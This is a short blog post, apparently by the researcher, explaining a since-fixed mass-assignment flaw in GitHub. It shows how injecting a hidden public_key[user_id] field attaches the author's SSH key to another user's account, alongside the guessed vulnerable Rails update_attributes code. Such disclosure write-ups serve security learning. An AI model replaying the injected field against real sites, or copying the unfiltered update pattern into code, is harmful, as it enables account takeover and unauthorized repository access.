Taken from: http://homakov.blogspot.com/2012/03/how-to.html
current page views count: 43559. is it really interesting? If so, let's walk through what I did(since GH guys told me they fixed it)
-
we have relations. Let me imagine what gh got inside of app:
class PublicKey <.. belongs_to :user
that means that table public_keys
got user_id:Integer
field.
So what we need to do is to create new Public key in your account.
>cat ~/.ssh/*pub
and paste it and then submit. Then press edit on fresh-created public key and, e.g. open webinspector to add new field, like below:
input type=hidden value=USER_ID name=public_key[user_id]
so for my stupid prank I used USER_ID which i got at https://api.github.com/users/rails
id = 4223
then press update.
So, what goes on on back end? I can guess:
@pk = PublicKey.find(params[:id])
@pk.update_attributes(params[:public_key]) #Oh no! We passed public_key[user_id] of our victim!
after that procedure your victim got your public key. Enjoy your pushing